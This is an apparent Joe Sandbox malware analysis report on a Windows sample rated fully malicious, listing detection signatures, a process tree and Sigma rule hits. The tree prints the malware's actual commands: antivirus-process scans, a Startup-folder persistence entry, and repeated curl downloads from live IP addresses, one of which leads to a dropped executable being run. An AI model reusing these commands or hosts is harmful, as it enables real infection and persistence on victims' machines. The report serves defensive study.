Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561834
MD5:c938c02a19091a3acd044001631692c8
SHA1:681e661b16ae2bebce2ef18facb86de6fd727cae
SHA256:e090769b89bee3e8ab4a316355fab8da61f629b0eee9da37c0ac312bdc20aad8
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Copy itself to suspicious location via type command
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Recon Command Output Piped To Findstr.EXE
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 3160 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C938C02A19091A3ACD044001631692C8)
    • cmd.exe (PID: 4440 cmdline: "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1472 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5548 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6476 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1372 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2636 cmdline: cmd /c md 768032 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 3576 cmdline: cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Finish.com (PID: 5544 cmdline: Finish.com G MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 6004 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & echo URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5356 cmdline: "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 6176 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName MD5: E2DE6500DE1148C7F6027AD50AC8B891)
        • cmd.exe (PID: 3304 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5524 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6784 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • Conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2680 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 7056 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 4952 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5492 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3712 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5712 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5632 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 6620 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6948 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 5476 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3580 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 4428 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5620 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 6252 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 7128 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 6784 cmdline: "C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • azvw.exe (PID: 2380 cmdline: azvw.exe -o xhwq.zip MD5: 75375C22C72F1BEB76BEA39C22A1ED68)
        • cmd.exe (PID: 2296 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3996 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • Conhost.exe (PID: 4752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1288 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 4524 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 5808 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
            • WmiPrvSE.exe (PID: 5700 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
            • Conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • findstr.exe (PID: 2884 cmdline: findstr /C:"OS Name" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 5500 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3224 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 2136 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 1496 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 3040 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 4276 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 768 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6604 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7056 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6976 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 4760 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6160 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 4440 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 2516 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5560 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RevenueDevices.exe (PID: 4012 cmdline: "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" MD5: B487B5B51436B42576D60A1FE58F8399)
          • cmd.exe (PID: 1336 cmdline: "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4292 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3772 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • cmd.exe (PID: 1380 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 3876 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • Conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3380 cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 6064 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
            • Conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 5540 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 1848 cmdline: curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • Conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 5592 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnoSphere.scr (PID: 2676 cmdline: "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
No configs have been found
No yara matches

Spreading

barindex
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403, CommandLine: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Finish.com G, ParentImage: C:\Users\user\AppData\Local\Temp\768032\Finish.com, ParentProcessId: 5544, ParentProcessName: Finish.com, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403, ProcessId: 3304, ProcessName: cmd.exe

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" , ProcessId: 5592, ProcessName: wscript.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, CommandLine: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Finish.com G, ParentImage: C:\Users\user\AppData\Local\Temp\768032\Finish.com, ParentProcessId: 5544, ParentProcessName: Finish.com, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1, ProcessId: 6588, ProcessName: cmd.exe
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\768032\Finish.com, ProcessId: 5544, TargetFilename: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3160, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd, ProcessId: 4440, ProcessName: cmd.exe
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\768032\Finish.com, ProcessId: 5544, TargetFilename: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6", CommandLine: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Finish.com G, ParentImage: C:\Users\user\AppData\Local\Temp\768032\Finish.com, ParentProcessId: 5544, ParentProcessName: Finish.com, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" 